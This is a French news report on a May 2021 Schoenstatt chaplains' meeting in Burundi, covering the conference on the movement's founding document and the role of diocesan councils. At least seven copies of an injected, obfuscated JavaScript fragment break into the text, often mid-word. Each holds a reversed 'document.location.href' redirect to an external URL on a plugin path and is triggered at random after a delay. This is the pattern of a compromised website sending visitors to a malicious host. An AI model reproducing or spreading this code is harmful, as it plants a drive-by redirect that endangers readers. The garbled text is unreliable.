En date du 13 au 15/05/2021 a eu lieu à Mont Sion Gikungu la rencontre des aumôniers et leurs comités diocésains. La rencontre était dirigée par l’aumônier national et régional en la personne du Père Longin Ntiranyibagira.
C’est une tradition que la famille de Schoenstatt ait une telle rencontre qui rassemble tous les aumôniers de la région des grands lacs au mois de mai mais cette année a eu une perturbation due à la pandémie de la covid 19, pandémie qui paralyse le monde en général. Au cours des années écoulées cette rencontre rassemblait un grand nombre des représentants ; cependant, à cause de la raison citée, il a été difficile de faire comme d’habitude car le respect des normes sanitaires s’imposent. Cette fois-ci seulement 4 membres du comité plus l’aumônier étaient invités à ce grand rendez-vous. Tous les diocèses que compte notre pays étaient bien représentés excepté l’aumônier de Bubanza qui n’était pas là, empêché pour des raisons de maladie, que Dieu le guérisse et nous lui souhaitons prompte guérison, toute fois les représentants de son comité étaient présents. A côté de ces comités diocésains avec les aumôniers, on pouvait aussi remarquer la présence des membres de la Centrale.
La rencontre a commencé le jeudi soir par la prière du soir au sanctuaire, ça était aussi l’occasion pour souhaiter la bienvenue à tout le monde. La rencontre proprement dite a commencé le vendredi matin. A l’ordre du jour il y avait : la présentation des participants et aperçu général de l’apostolat dans les diocèses, la conférence, le travail en groupes, la restitution des travaux des groupes, les résolutions finales ainsi que la préparation de la semaine d’octobre.
Après la présentation et l’aperçu général de l’apostolat dans les diocèses, c’était le moment de la conférence qui a été animée par le Père Longin Ntiranyibagira, aumônier national et régional. La conférence était axée sur le Premier toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}document de Fondation. Le Père aumônier a montré dans sa conférence la place de l’auto-éducation, notre lien avec la Mère Trois fois Admirable de Schoenstatt dans la vie de tout schoenstattien. La Famille de Schoenstatt toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit rester notre première préoccupation, point n’est besoin d’être un grand nombre mais de personnes dynamiques, actives et qui comprennent leur mission. La chose la plus importante que nous devons cultiver est le charisme de l’unité a-t-il une fois de plus demandé à tous les participants. Nous sommes une famille et chacun toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit faire en sorte que cette dernière reste toujours unie.
Le Père aumônier national et régional a rappelé aux participants que le conseil diocésain est dirigé par l’aumônier diocésain aidé par les membres de ce conseil. C’est ainsi que notre famille a toujours un aumônier qui coortoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne les activités du mouvement et qu’il a besoin des collaborateurs qui ont des toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dons différents. Ce conseil travaille en commun accord avec l’aumônier dirigeant diocésain. Voilà pourquoi quand il y a changement de l’aumônier tout reste au bon fixe, qu’il n’y ait pas de vide. Ce conseil diocésain aidé par l’Aumônier diocésain dirigeant est chargé d’enseigner le charisme de Schoenstatt, il toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit toujours être présent et disponible pour participer à des sessions de formations. Il est important d’éviter les hommes de masse mais former des personnalités correctes capables de défendre Schoenstatt.
A la fin de sa conférence le Père aumônier national et régional a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné des questions qui ont été décortiquées et sur base desquelles sont sorties des résolutions qui ont été prises et qui seront comme ligne de conduite. Ces résolutions prises ont été acceptées et signées par tout le monde et ont été offertes comme contribution au capital de grâces à la Mère Trois fois Admirable dans le sanctuaire.
A la fin de la session tous les participants ont salué chaleureusement la tenue toujours de cette rencontre et ont été satisfait des enseignements qui ont été toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnés.
Philippe KITABU